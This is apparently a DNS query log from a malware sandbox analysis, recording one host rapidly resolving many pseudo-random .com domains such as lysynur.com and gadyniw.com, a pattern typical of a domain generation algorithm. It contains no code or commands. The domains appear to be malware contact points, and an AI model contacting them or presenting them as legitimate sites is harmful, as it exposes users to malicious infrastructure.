Aug 23, 2024 18:42:49.158109903 CEST	192.168.2.5	1.1.1.1	0xd175	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.158668995 CEST	192.168.2.5	1.1.1.1	0x4ee3	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.158994913 CEST	192.168.2.5	1.1.1.1	0xb33b	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.158994913 CEST	192.168.2.5	1.1.1.1	0x86de	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.169708014 CEST	192.168.2.5	1.1.1.1	0x751	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.172177076 CEST	192.168.2.5	1.1.1.1	0xf178	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.172477007 CEST	192.168.2.5	1.1.1.1	0xad90	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.172635078 CEST	192.168.2.5	1.1.1.1	0x1c3e	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.172991991 CEST	192.168.2.5	1.1.1.1	0x30b8	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.172991991 CEST	192.168.2.5	1.1.1.1	0xcd43	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.173327923 CEST	192.168.2.5	1.1.1.1	0x7fc1	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.173546076 CEST	192.168.2.5	1.1.1.1	0xafdc	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.176510096 CEST	192.168.2.5	1.1.1.1	0xee1f	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.176760912 CEST	192.168.2.5	1.1.1.1	0xa1af	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.177601099 CEST	192.168.2.5	1.1.1.1	0x2984	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.177601099 CEST	192.168.2.5	1.1.1.1	0x9750	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.192434072 CEST	192.168.2.5	1.1.1.1	0x536	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.194078922 CEST	192.168.2.5	1.1.1.1	0x122a	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.194344997 CEST	192.168.2.5	1.1.1.1	0xfcf9	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.194781065 CEST	192.168.2.5	1.1.1.1	0xf0af	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.206213951 CEST	192.168.2.5	1.1.1.1	0x3b77	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.206494093 CEST	192.168.2.5	1.1.1.1	0xf618	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.206754923 CEST	192.168.2.5	1.1.1.1	0xd54	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.206989050 CEST	192.168.2.5	1.1.1.1	0xd364	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207195044 CEST	192.168.2.5	1.1.1.1	0xc46f	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207349062 CEST	192.168.2.5	1.1.1.1	0x9c58	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207525015 CEST	192.168.2.5	1.1.1.1	0xdd8b	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207613945 CEST	192.168.2.5	1.1.1.1	0x61c1	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207803011 CEST	192.168.2.5	1.1.1.1	0x1d50	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207953930 CEST	192.168.2.5	1.1.1.1	0x8871	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.208010912 CEST	192.168.2.5	1.1.1.1	0x6cf9	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.208144903 CEST	192.168.2.5	1.1.1.1	0xe63a	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.208368063 CEST	192.168.2.5	1.1.1.1	0xe0a2	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.208775997 CEST	192.168.2.5	1.1.1.1	0x81af	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.209197044 CEST	192.168.2.5	1.1.1.1	0x4b8a	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.209444046 CEST	192.168.2.5	1.1.1.1	0xcbc4	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.209664106 CEST	192.168.2.5	1.1.1.1	0xfd80	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.209976912 CEST	192.168.2.5	1.1.1.1	0x4296	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.210165024 CEST	192.168.2.5	1.1.1.1	0x8849	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:50.119424105 CEST	192.168.2.5	1.1.1.1	0xcc42	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:51.129838943 CEST	192.168.2.5	1.1.1.1	0xcc42	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.200515985 CEST	192.168.2.5	1.1.1.1	0x21ad	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.200836897 CEST	192.168.2.5	1.1.1.1	0x34f8	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.201383114 CEST	192.168.2.5	1.1.1.1	0xc21c	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.201590061 CEST	192.168.2.5	1.1.1.1	0x6cb8	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.202078104 CEST	192.168.2.5	1.1.1.1	0x6dc8	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.202625036 CEST	192.168.2.5	1.1.1.1	0xb9d1	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.203556061 CEST	192.168.2.5	1.1.1.1	0x46ae	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.204184055 CEST	192.168.2.5	1.1.1.1	0xeebc	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.205132961 CEST	192.168.2.5	1.1.1.1	0x4828	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.205763102 CEST	192.168.2.5	1.1.1.1	0x5916	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.205959082 CEST	192.168.2.5	1.1.1.1	0x70f2	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.206351042 CEST	192.168.2.5	1.1.1.1	0x524e	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.206528902 CEST	192.168.2.5	1.1.1.1	0xe950	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.207118034 CEST	192.168.2.5	1.1.1.1	0x7af3	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.207382917 CEST	192.168.2.5	1.1.1.1	0xc2f2	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.207556009 CEST	192.168.2.5	1.1.1.1	0x9179	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.208324909 CEST	192.168.2.5	1.1.1.1	0x5b49	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.208874941 CEST	192.168.2.5	1.1.1.1	0x8938	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.209177017 CEST	192.168.2.5	1.1.1.1	0xaf65	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.209666967 CEST	192.168.2.5	1.1.1.1	0xfe43	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.210869074 CEST	192.168.2.5	1.1.1.1	0x8c6b	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.211102962 CEST	192.168.2.5	1.1.1.1	0xcc9	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.211385965 CEST	192.168.2.5	1.1.1.1	0xe5ab	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.211880922 CEST	192.168.2.5	1.1.1.1	0x7922	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.212336063 CEST	192.168.2.5	1.1.1.1	0x6beb	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.212503910 CEST	192.168.2.5	1.1.1.1	0xefd3	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.213705063 CEST	192.168.2.5	1.1.1.1	0x821d	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.214555979 CEST	192.168.2.5	1.1.1.1	0xb27d	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.254086018 CEST	192.168.2.5	1.1.1.1	0x4432	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.280251026 CEST	192.168.2.5	1.1.1.1	0x59ac	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.282011032 CEST	192.168.2.5	1.1.1.1	0x107d	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.283607006 CEST	192.168.2.5	1.1.1.1	0x87ab	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.297449112 CEST	192.168.2.5	1.1.1.1	0x5bd1	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.297867060 CEST	192.168.2.5	1.1.1.1	0xfd10	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.298736095 CEST	192.168.2.5	1.1.1.1	0x96ac	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.299137115 CEST	192.168.2.5	1.1.1.1	0xfdf2	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.299751043 CEST	192.168.2.5	1.1.1.1	0xc896	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.300843000 CEST	192.168.2.5	1.1.1.1	0xc6b	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.301290989 CEST	192.168.2.5	1.1.1.1	0x26f2	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.301619053 CEST	192.168.2.5	1.1.1.1	0x4966	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.301809072 CEST	192.168.2.5	1.1.1.1	0x6877	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.301975965 CEST	192.168.2.5	1.1.1.1	0x4260	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.302428007 CEST	192.168.2.5	1.1.1.1	0x6fc5	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.302623034 CEST	192.168.2.5	1.1.1.1	0x76b6	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.302999973 CEST	192.168.2.5	1.1.1.1	0xaa43	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.303369045 CEST	192.168.2.5	1.1.1.1	0x9fec	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.303899050 CEST	192.168.2.5	1.1.1.1	0xa803	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.304105997 CEST	192.168.2.5	1.1.1.1	0xd196	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.304652929 CEST	192.168.2.5	1.1.1.1	0xeb46	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.304920912 CEST	192.168.2.5	1.1.1.1	0x6970	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.305445910 CEST	192.168.2.5	1.1.1.1	0x1756	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.391102076 CEST	192.168.2.5	1.1.1.1	0x5c69	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.391191959 CEST	192.168.2.5	1.1.1.1	0x7267	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.393625021 CEST	192.168.2.5	1.1.1.1	0xffb4	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.394731045 CEST	192.168.2.5	1.1.1.1	0xa38a	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.395315886 CEST	192.168.2.5	1.1.1.1	0x5468	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.395339012 CEST	192.168.2.5	1.1.1.1	0x3a54	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.396102905 CEST	192.168.2.5	1.1.1.1	0x1568	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.396146059 CEST	192.168.2.5	1.1.1.1	0xc132	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.396399975 CEST	192.168.2.5	1.1.1.1	0xfdcf	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.397092104 CEST	192.168.2.5	1.1.1.1	0x1d10	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.397130966 CEST	192.168.2.5	1.1.1.1	0x8653	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.397313118 CEST	192.168.2.5	1.1.1.1	0xc9ab	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.397921085 CEST	192.168.2.5	1.1.1.1	0xe00	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.398194075 CEST	192.168.2.5	1.1.1.1	0x9e92	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.399410009 CEST	192.168.2.5	1.1.1.1	0xf774	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.401140928 CEST	192.168.2.5	1.1.1.1	0x7757	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.401487112 CEST	192.168.2.5	1.1.1.1	0x1c78	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.402645111 CEST	192.168.2.5	1.1.1.1	0x254e	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.402971029 CEST	192.168.2.5	1.1.1.1	0xdf7c	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.403887987 CEST	192.168.2.5	1.1.1.1	0x2b28	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.404298067 CEST	192.168.2.5	1.1.1.1	0xa6e6	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:58.420078039 CEST	192.168.2.5	1.1.1.1	0x21ad	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:58.420116901 CEST	192.168.2.5	1.1.1.1	0x8c6b	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:59.676784992 CEST	192.168.2.5	1.1.1.1	0x8c6b	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.281461954 CEST	192.168.2.5	1.1.1.1	0xb4f6	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.282006979 CEST	192.168.2.5	1.1.1.1	0x41aa	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.282232046 CEST	192.168.2.5	1.1.1.1	0xf26c	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.282485008 CEST	192.168.2.5	1.1.1.1	0xaa38	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.282972097 CEST	192.168.2.5	1.1.1.1	0x10e6	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.283159971 CEST	192.168.2.5	1.1.1.1	0xa20d	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.283443928 CEST	192.168.2.5	1.1.1.1	0x3b50	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.283714056 CEST	192.168.2.5	1.1.1.1	0x1050	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.283915997 CEST	192.168.2.5	1.1.1.1	0x739	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.284084082 CEST	192.168.2.5	1.1.1.1	0xd75	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.285747051 CEST	192.168.2.5	1.1.1.1	0x17cb	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373393059 CEST	192.168.2.5	1.1.1.1	0x732c	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373394012 CEST	192.168.2.5	1.1.1.1	0xa0fc	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373558998 CEST	192.168.2.5	1.1.1.1	0x1448	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373728037 CEST	192.168.2.5	1.1.1.1	0x9791	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373806953 CEST	192.168.2.5	1.1.1.1	0x506e	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.373980999 CEST	192.168.2.5	1.1.1.1	0xeaa8	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.374146938 CEST	192.168.2.5	1.1.1.1	0x269b	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.374631882 CEST	192.168.2.5	1.1.1.1	0xc846	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.374984026 CEST	192.168.2.5	1.1.1.1	0x2e97	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.375257969 CEST	192.168.2.5	1.1.1.1	0xac94	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.375716925 CEST	192.168.2.5	1.1.1.1	0xec98	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.375884056 CEST	192.168.2.5	1.1.1.1	0x8f5b	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.376970053 CEST	192.168.2.5	1.1.1.1	0xca0c	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.377491951 CEST	192.168.2.5	1.1.1.1	0xa210	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.378470898 CEST	192.168.2.5	1.1.1.1	0x4005	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.378916979 CEST	192.168.2.5	1.1.1.1	0x2452	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.379492998 CEST	192.168.2.5	1.1.1.1	0xf7a9	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.379996061 CEST	192.168.2.5	1.1.1.1	0xe6f4	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.380397081 CEST	192.168.2.5	1.1.1.1	0x9107	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.381162882 CEST	192.168.2.5	1.1.1.1	0x4355	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.381382942 CEST	192.168.2.5	1.1.1.1	0x7a54	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.381731987 CEST	192.168.2.5	1.1.1.1	0x8237	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.381959915 CEST	192.168.2.5	1.1.1.1	0xaf16	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.382508039 CEST	192.168.2.5	1.1.1.1	0xe552	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.382931948 CEST	192.168.2.5	1.1.1.1	0xf7e3	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.383359909 CEST	192.168.2.5	1.1.1.1	0xbee1	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.383682013 CEST	192.168.2.5	1.1.1.1	0xa980	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.383923054 CEST	192.168.2.5	1.1.1.1	0x97f2	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.384130955 CEST	192.168.2.5	1.1.1.1	0xead4	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.384551048 CEST	192.168.2.5	1.1.1.1	0xda49	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.384726048 CEST	192.168.2.5	1.1.1.1	0x92d1	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385118008 CEST	192.168.2.5	1.1.1.1	0xee14	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385339975 CEST	192.168.2.5	1.1.1.1	0x2d06	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.385901928 CEST	192.168.2.5	1.1.1.1	0xdd28	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.386202097 CEST	192.168.2.5	1.1.1.1	0xf218	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.386698008 CEST	192.168.2.5	1.1.1.1	0xca91	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.387283087 CEST	192.168.2.5	1.1.1.1	0xcccc	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.387662888 CEST	192.168.2.5	1.1.1.1	0x8c0f	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.388015032 CEST	192.168.2.5	1.1.1.1	0x13cc	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.388511896 CEST	192.168.2.5	1.1.1.1	0xde59	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.388727903 CEST	192.168.2.5	1.1.1.1	0x6e6c	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.389672041 CEST	192.168.2.5	1.1.1.1	0x794e	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.389905930 CEST	192.168.2.5	1.1.1.1	0x42a0	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.390325069 CEST	192.168.2.5	1.1.1.1	0xb1b8	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.390825033 CEST	192.168.2.5	1.1.1.1	0xe2eb	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.391207933 CEST	192.168.2.5	1.1.1.1	0x5a08	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.391472101 CEST	192.168.2.5	1.1.1.1	0x52b	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.391752005 CEST	192.168.2.5	1.1.1.1	0xed5a	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.392357111 CEST	192.168.2.5	1.1.1.1	0xe1ed	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.392720938 CEST	192.168.2.5	1.1.1.1	0x1040	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.392926931 CEST	192.168.2.5	1.1.1.1	0x84fc	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.393568993 CEST	192.168.2.5	1.1.1.1	0xf72c	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.452342987 CEST	192.168.2.5	1.1.1.1	0x7b39	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.452822924 CEST	192.168.2.5	1.1.1.1	0xb19c	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.452945948 CEST	192.168.2.5	1.1.1.1	0xcaef	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.453327894 CEST	192.168.2.5	1.1.1.1	0xd6fa	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.453469992 CEST	192.168.2.5	1.1.1.1	0x33e9	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.453685999 CEST	192.168.2.5	1.1.1.1	0xaea	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.454216957 CEST	192.168.2.5	1.1.1.1	0xfc54	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.454335928 CEST	192.168.2.5	1.1.1.1	0x176d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.456010103 CEST	192.168.2.5	1.1.1.1	0xadde	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
